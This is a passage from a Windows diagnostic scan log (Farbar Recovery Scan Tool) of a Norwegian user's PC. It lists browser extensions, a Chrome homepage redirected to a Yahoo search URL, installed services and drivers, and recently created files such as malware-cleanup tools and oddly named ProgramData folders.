FF HKLM-x32\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF
FF Extension: Avast SafePrice - C:\Program Files\AVAST Software\Avast\SafePrice\FF [2016-01-22]
 
Chrome: 
=======
CHR HomePage: Default -> hxxps://no.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_camstd_15_52&param1=1&param2=f%3D1%26b%3DChrome%26cc%3Dno%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzz0Czzzy0AyDtD0DtCyD0AyEyE0B0F0BtN0D0Tzu0StCyEyDyEtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyE0B0E0CtB0BtB0BtGtD0EyDzytG0EyCyBzytGyByC0AtAtG0Bzz0CyByEyC0B0D0F0D0E0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0D0Azy0FtCyByE0BtGtC0E0FtCtGyEyC0BtAtG0A0EtBtCtGzz0D0AyE0AyCtCtA0Fzy0EyE2QtN0A0LzuyE%26cr%3D1100335688%26a%3Dwncy_camstd_15_52%26os_ver%3D6.3%26os%3DWindows%2B8.1
CHR StartupUrls: Default -> "hxxps://no.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_camstd_15_52&param1=1&param2=f%3D7%26b%3DChrome%26cc%3Dno%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzz0Czzzy0AyDtD0DtCyD0AyEyE0B0F0BtN0D0Tzu0StCyEyDyEtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyE0B0E0CtB0BtB0BtGtD0EyDzytG0EyCyBzytGyByC0AtAtG0Bzz0CyByEyC0B0D0F0D0E0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0D0Azy0FtCyByE0BtGtC0E0FtCtGyEyC0BtAtG0A0EtBtCtGzz0D0AyE0AyCtCtA0Fzy0EyE2QtN0A0LzuyE%26cr%3D1100335688%26a%3Dwncy_camstd_15_52%26os_ver%3D6.3%26os%3DWindows%2B8.1"
CHR Profile: C:\Users\Eirik\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\Eirik\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-05]
CHR Extension: (Google Drive) - C:\Users\Eirik\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-25]
CHR Extension: (YouTube) - C:\Users\Eirik\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-10-20]
CHR Extension: (Google Search) - C:\Users\Eirik\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-04]
CHR Extension: (Google Docs Offline) - C:\Users\Eirik\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-23]
CHR Extension: (Chrome Nettmarked-betalinger) - C:\Users\Eirik\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-07-25]
CHR Extension: (Gmail) - C:\Users\Eirik\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-29]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2016-01-20]
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [227968 2013-02-26] (Qualcomm Atheros Commnucations) [File not signed]
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [226440 2016-01-20] (AVAST Software)
S2 BstHdAndroidSvc; c:\Program Files (x86)\BlueStacks\HD-Service.exe [393080 2013-01-07] (BlueStack Systems, Inc.)
R2 BstHdLogRotatorSvc; c:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [384888 2013-01-07] (BlueStack Systems, Inc.)
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1163200 2016-01-12] (NVIDIA Corporation)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [15344 2013-03-22] (Intel Corporation)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [326760 2014-09-05] (Intel Corporation)
R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [731648 2013-02-13] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [820184 2013-02-13] (Intel® Corporation)
R2 Intel® ME Service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe [131544 2013-03-12] (Intel Corporation)
S3 iumsvc; C:\Program Files (x86)\Intel\Intel® Update Manager\bin\iumsvc.exe [178312 2015-09-25] (Intel Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [169432 2013-03-12] (Intel Corporation)
R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe [417552 2015-11-12] (LogMeIn, Inc.)
R2 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [193144 2015-11-20] (Logitech Inc.)
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1513784 2015-10-05] (Malwarebytes)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
R2 Micro Star SCM; C:\Program Files (x86)\SCM\MSIService.exe [160768 2013-04-18] (Micro-Star International Co., Ltd.) [File not signed]
R2 MSI_SuperCharger; C:\Program Files (x86)\MSI\Super-Charger\ChargeService.exe [154112 2013-02-08] (MSI) [File not signed]
S3 npggsvc; C:\WINDOWS\SysWOW64\GameMon.des [3611808 2015-07-22] (INCA Internet Co., Ltd.)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1879488 2016-01-12] (NVIDIA Corporation)
S3 NvStreamNetworkSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe [6308288 2016-01-12] (NVIDIA Corporation)
S2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [4812736 2016-01-12] (NVIDIA Corporation)
R2 OfficeSvc; C:\Program Files\Microsoft Office 15\ClientX64\integratedoffice.exe [1854056 2012-12-07] (Microsoft Corporation)
R2 Qualcomm Atheros Killer Service; C:\Program Files\Qualcomm Atheros\Killer Network Manager\BFNService.exe [495616 2013-03-15] () [File not signed]
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation)
S2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation)
R2 WTabletServiceCon; C:\Program Files\Tablet\Pen\WTabletServiceCon.exe [619904 2012-12-11] (Wacom Technology, Corp.)
R2 ZAtheros Bt and Wlan Coex Agent; C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe [323584 2013-02-25] (Atheros) [File not signed]
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 akw8x64; C:\Windows\system32\DRIVERS\akw8x64.sys [3758800 2013-03-15] (Qualcomm Atheros, Inc.)
R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [28656 2016-01-20] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [97648 2016-01-20] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [93528 2016-01-20] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65224 2016-01-20] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1065208 2016-01-20] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [464256 2016-01-20] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [155304 2016-01-20] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [273784 2016-01-20] (AVAST Software)
S1 BfLwf; C:\Windows\system32\DRIVERS\bwcW8x64.sys [74096 2013-03-15] (Qualcomm Atheros, Inc.)
S2 BstHdDrv; c:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [71032 2013-01-07] (BlueStack Systems)
S3 BTATH_LWFLT; C:\Windows\system32\DRIVERS\btath_lwflt.sys [77464 2013-02-26] (Qualcomm Atheros)
S3 dot4; C:\Windows\system32\DRIVERS\Dot4.sys [151968 2012-10-19] (Windows ® Win 7 DDK provider)
S3 Dot4Print; C:\Windows\System32\drivers\Dot4Prt.sys [27040 2012-10-19] (Windows ® Win 7 DDK provider)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
R3 Hamachi; C:\Windows\system32\DRIVERS\Hamdrv.sys [45680 2015-11-12] (LogMeIn Inc.)
R3 Ke2200; C:\Windows\system32\DRIVERS\e22w8x64.sys [174448 2013-03-15] (Qualcomm Atheros, Inc.)
S3 LADF_BakerCOnly; C:\Windows\system32\DRIVERS\ladfBakerCamd64.sys [363096 2010-07-08] (Logitech)
S3 LADF_BakerROnly; C:\Windows\system32\DRIVERS\ladfBakerRamd64.sys [334552 2010-07-08] (Logitech)
R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-21] (Logitech)
R3 LGJoyXlCore; C:\Windows\system32\drivers\LGJoyXlCore.sys [68384 2015-06-11] (Logitech Inc.)
S3 lgLowAudio; C:\Windows\system32\drivers\lgLowAudio.sys [26264 2015-11-20] (Logitech Inc.)
S3 LGSHidFilt; C:\Windows\system32\DRIVERS\LGSHidFilt.Sys [64280 2013-05-30] (Logitech Inc.)
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-02-21] (Malwarebytes)
R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
R3 NTIOLib_1_0_3; C:\Program Files (x86)\MSI\Super-Charger\NTIOLib_X64.sys [13368 2012-10-26] (MSI)
R1 nvkflt; C:\Windows\system32\DRIVERS\nvkflt.sys [307768 2016-01-23] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [47760 2015-12-18] (NVIDIA Corporation)
R3 RTSPER; C:\Windows\system32\DRIVERS\RtsPer.sys [448072 2013-04-24] (RTS Corporation)
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [34544 2015-10-29] (Synaptics Incorporated)
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2015-06-10] (Apple, Inc.) [File not signed]
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-02-21 17:14 - 2016-02-21 17:14 - 00031774 _____ C:\Users\Eirik\Desktop\FRST.txt
2016-02-21 16:23 - 2016-02-21 16:23 - 02371072 _____ (Farbar) C:\Users\Eirik\Downloads\FRST64 (1).exe
2016-02-21 16:23 - 2016-02-21 16:23 - 02371072 _____ (Farbar) C:\Users\Eirik\Desktop\FRST64.exe
2016-02-21 16:23 - 2016-02-21 16:23 - 00000000 ____D C:\Users\Eirik\Documents\Egendefinerte Office-maler
2016-02-21 16:22 - 2016-02-21 17:14 - 00000000 ____D C:\FRST
2016-02-21 16:21 - 2016-02-21 16:21 - 02371072 _____ (Farbar) C:\Users\Eirik\Downloads\FRST64.exe
2016-02-21 16:21 - 2016-02-21 16:21 - 01722368 _____ (Farbar) C:\Users\Eirik\Downloads\FRST.exe
2016-02-21 15:20 - 2016-02-21 15:20 - 07194312 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x64 (5).exe
2016-02-21 15:20 - 2016-02-21 15:20 - 06503984 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x86 (5).exe
2016-02-21 15:20 - 2016-02-21 15:20 - 01420840 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_arm (2).exe
2016-02-21 15:19 - 2016-02-21 15:19 - 07186992 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x64 (4).exe
2016-02-21 15:19 - 2016-02-21 15:19 - 06554576 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x86 (4).exe
2016-02-21 15:19 - 2016-02-21 15:19 - 05673816 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x64 (3).exe
2016-02-21 15:19 - 2016-02-21 15:19 - 01453976 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_arm (1).exe
2016-02-21 15:18 - 2016-02-21 15:18 - 04995416 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x86 (3).exe
2016-02-21 15:18 - 2016-02-21 15:18 - 04961800 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x64 (2).exe
2016-02-21 15:18 - 2016-02-21 15:18 - 04216840 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x86 (2).exe
2016-02-21 15:17 - 2016-02-21 15:17 - 03200960 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x64 (1).exe
2016-02-21 15:16 - 2016-02-21 15:16 - 02723264 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x86 (1).exe
2016-02-21 15:15 - 2016-02-21 15:15 - 07194312 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x64.exe
2016-02-21 15:15 - 2016-02-21 15:15 - 06503984 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x86.exe
2016-02-21 15:15 - 2016-02-21 15:15 - 01420840 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_arm.exe
2016-02-21 15:14 - 2016-02-21 16:19 - 00001002 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-02-21 15:14 - 2016-02-21 15:19 - 00000998 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-02-21 15:14 - 2016-02-21 15:14 - 00003974 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2016-02-21 15:14 - 2016-02-21 15:14 - 00003738 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2016-02-21 15:14 - 2016-02-21 15:14 - 00002308 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-02-21 15:14 - 2016-02-21 15:14 - 00000000 ____D C:\Users\Eirik\AppData\Local\Deployment
2016-02-21 15:14 - 2016-02-21 15:14 - 00000000 ____D C:\Users\Eirik\AppData\Local\Apps\2.0
2016-02-21 15:10 - 2016-02-21 15:10 - 00001181 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2016-02-21 15:10 - 2016-02-21 15:10 - 00001169 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2016-02-21 15:10 - 2016-02-21 15:10 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-02-21 15:10 - 2016-02-21 15:10 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-02-21 14:44 - 2016-02-21 15:20 - 00000000 ____D C:\ProgramData\Package Cache
2016-02-21 14:44 - 2016-02-21 14:44 - 13767776 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vc_redist.x86.exe
2016-02-21 14:06 - 2016-02-21 14:06 - 00000000 ____D C:\ProgramData\e8446722-6f23-0
2016-02-21 14:06 - 2016-02-21 14:06 - 00000000 ____D C:\ProgramData\e8446722-2d61-1
2016-02-21 13:44 - 2016-02-21 13:44 - 00242080 _____ C:\Users\Eirik\Downloads\Firefox Setup Stub 44.0.2.exe
2016-02-21 12:57 - 2016-02-21 15:59 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-02-21 12:56 - 2016-02-21 12:56 - 22908888 _____ (Malwarebytes ) C:\Users\Eirik\Downloads\mbam-setup-2.2.0.1024.exe
2016-02-21 12:56 - 2016-02-21 12:56 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-02-21 12:56 - 2016-02-21 12:56 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-02-21 12:56 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-02-21 12:56 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2016-02-21 12:56 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2016-02-21 12:46 - 2016-02-21 12:48 - 00000000 ____D C:\AdwCleaner
2016-02-21 12:46 - 2016-02-21 12:46 - 01511424 _____ C:\Users\Eirik\Downloads\adwcleaner_5.035.exe
2016-02-21 04:20 - 2016-02-21 04:20 - 00000000 ____D C:\Users\Eirik\Desktop\Gamle Firefox-data
2016-02-20 20:06 - 2016-02-21 13:37 - 00000000 ____D C:\ProgramData\e8446722-6925-0
2016-02-20 20:01 - 2016-02-21 13:37 - 00000000 ____D C:\ProgramData\e8446722-69a5-0
2016-02-20 20:01 - 2016-02-20 20:01 - 00003728 _____ C:\WINDOWS\System32\Tasks\{C6E33A63-3216-AF1A-2367-44E89883B011}
2016-02-20 20:01 - 2016-02-20 20:01 - 00000000 ____D C:\ProgramData\d2538854
2016-02-19 12:46 - 2016-02-19 12:46 - 00000000 ____D C:\Users\Eirik\AppData\Local\Jagex
2016-02-19 12:46 - 2016-02-19 12:46 - 00000000 ____D C:\ProgramData\Jagex
2016-02-19 12:44 - 2016-02-19 12:44 - 03269920 _____ (Jagex Ltd ) C:\Users\Eirik\Downloads\RuneScape-Setup.exe
2016-02-18 00:04 - 2016-02-18 00:04 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2016-02-17 13:06 - 2016-02-17 13:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013
2016-02-17 13:05 - 2016-02-17 13:05 - 01113856 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\Setup.X86.nb-no_O365ProPlusRetail_a9a627a4-ddaa-4aab-9b90-4499b4a944e3_TX_PR_.exe
2016-02-17 13:05 - 2016-02-17 13:05 - 00000000 ____D C:\Program Files\Microsoft Office 15
2016-02-17 12:17 - 2016-02-17 12:17 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\GeoGebra 5.0
2016-02-15 14:58 - 2016-02-15 14:58 - 00005019 _____ C:\Users\Eirik\Downloads\replay_1346256955.bat
2016-02-13 01:48 - 2016-02-13 01:48 - 00000000 ____D C:\Users\Eirik\AppData\Local\Nico Mak Computing
2016-02-13 01:48 - 2016-02-13 01:48 - 00000000 ____D C:\ProgramData\WinZip
2016-02-13 01:45 - 2016-02-13 01:50 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-02-13 01:45 - 2016-02-13 01:49 - 00097888 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2016-02-13 01:43 - 2016-02-13 01:43 - 00735328 _____ (Oracle Corporation) C:\Users\Eirik\Downloads\jxpiinstall(5).exe
2016-02-13 01:26 - 2016-02-13 01:26 - 30510920 _____ C:\Users\Eirik\Downloads\vlc-2.2.2-win32.exe
2016-02-12 02:51 - 2016-02-06 11:48 - 25839104 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-02-12 02:51 - 2016-02-06 11:24 - 02887680 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-02-12 02:51 - 2016-02-06 11:01 - 20366848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-02-12 02:51 - 2016-02-06 10:43 - 02280448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-02-12 02:51 - 2016-02-06 10:32 - 14458368 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-02-12 02:51 - 2016-02-06 10:16 - 12857856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-02-12 02:51 - 2016-02-06 10:09 - 01547264 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-02-12 02:51 - 2016-02-06 09:54 - 01312256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-02-10 10:44 - 2016-01-22 09:01 - 22365992 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-02-10 10:44 - 2016-01-22 08:11 - 19794896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-02-10 10:44 - 2016-01-22 06:25 - 14467072 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-02-10 10:44 - 2016-01-22 06:14 - 12879360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-02-10 10:44 - 2016-01-15 02:42 - 00033472 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2016-02-10 10:44 - 2016-01-14 21:44 - 01362944 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2016-02-10 10:44 - 2016-01-14 21:44 - 01162240 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-02-10 10:44 - 2016-01-14 21:44 - 00696320 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-02-10 10:44 - 2016-01-14 21:44 - 00677376 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2016-02-10 10:44 - 2016-01-14 21:44 - 00499200 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-02-10 10:44 - 2016-01-14 21:44 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2016-02-10 10:44 - 2016-01-10 20:37 - 00442720 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2016-02-10 10:44 - 2016-01-10 19:39 - 00332640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2016-02-10 10:44 - 2016-01-10 19:15 - 00401920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2016-02-10 10:44 - 2016-01-10 19:15 - 00202240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2016-02-10 10:44 - 2016-01-10 18:50 - 00062464 _____ (Microsoft Corporation) C:\WINDOWS\system32\cfgbkend.dll
2016-02-10 10:44 - 2016-01-10 18:43 - 00445440 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll
2016-02-10 10:44 - 2016-01-10 18:31 - 00162304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
2016-02-10 10:44 - 2016-01-10 18:16 - 00898048 _____ (Microsoft Corporation) C:\WINDOWS\system32\CPFilters.dll
2016-02-10 10:44 - 2016-01-10 18:14 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cfgbkend.dll
2016-02-10 10:44 - 2016-01-10 18:12 - 00532480 _____ (Microsoft Corporation) C:\WINDOWS\system32\EncDec.dll
2016-02-10 10:44 - 2016-01-10 18:09 - 01442304 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-02-10 10:44 - 2016-01-10 18:09 - 00324096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll
2016-02-10 10:44 - 2016-01-10 18:02 - 00987648 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-02-10 10:44 - 2016-01-10 17:58 - 00166400 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
2016-02-10 10:44 - 2016-01-10 17:56 - 00186880 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpapisrv.dll
2016-02-10 10:44 - 2016-01-10 17:51 - 00702976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CPFilters.dll
2016-02-10 10:44 - 2016-01-10 17:49 - 00443392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EncDec.dll
2016-02-10 10:44 - 2016-01-10 17:43 - 00801792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-02-10 10:44 - 2016-01-10 17:40 - 00116736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
2016-02-10 10:44 - 2016-01-07 19:34 - 04175872 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2016-02-10 10:44 - 2015-12-29 16:45 - 07783936 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-02-10 10:44 - 2015-12-29 16:45 - 07075328 _____ (Microsoft Corporation) C:\WINDOWS\system32\glcndFilter.dll
2016-02-10 10:44 - 2015-12-29 16:43 - 05267968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\glcndFilter.dll
2016-02-10 10:44 - 2015-12-29 16:42 - 05264384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2016-02-10 10:43 - 2016-01-22 07:40 - 00571904 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2016-02-10 10:43 - 2016-01-22 07:29 - 06052352 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-02-10 10:43 - 2016-01-22 07:28 - 00108544 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll
2016-02-10 10:43 - 2016-01-22 07:27 - 00817664 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2016-02-10 10:43 - 2016-01-22 07:02 - 00496640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2016-02-10 10:43 - 2016-01-22 06:55 - 01032704 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
2016-02-10 10:43 - 2016-01-22 06:52 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll
2016-02-10 10:43 - 2016-01-22 06:51 - 00663552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2016-02-10 10:43 - 2016-01-22 06:50 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2016-02-10 10:43 - 2016-01-22 06:48 - 00718336 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2016-02-10 10:43 - 2016-01-22 06:48 - 00372224 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2016-02-10 10:43 - 2016-01-22 06:47 - 00798208 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2016-02-10 10:43 - 2016-01-22 06:46 - 02123264 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2016-02-10 10:43 - 2016-01-22 06:35 - 04611072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-02-10 10:43 - 2016-01-22 06:31 - 02597376 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-02-10 10:43 - 2016-01-22 06:31 - 00880128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
2016-02-10 10:43 - 2016-01-22 06:28 - 02880000 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll
2016-02-10 10:43 - 2016-01-22 06:27 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2016-02-10 10:43 - 2016-01-22 06:25 - 00687104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2016-02-10 10:43 - 2016-01-22 06:25 - 00325632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2016-02-10 10:43 - 2016-01-22 06:24 - 02050560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2016-02-10 10:43 - 2016-01-22 06:08 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
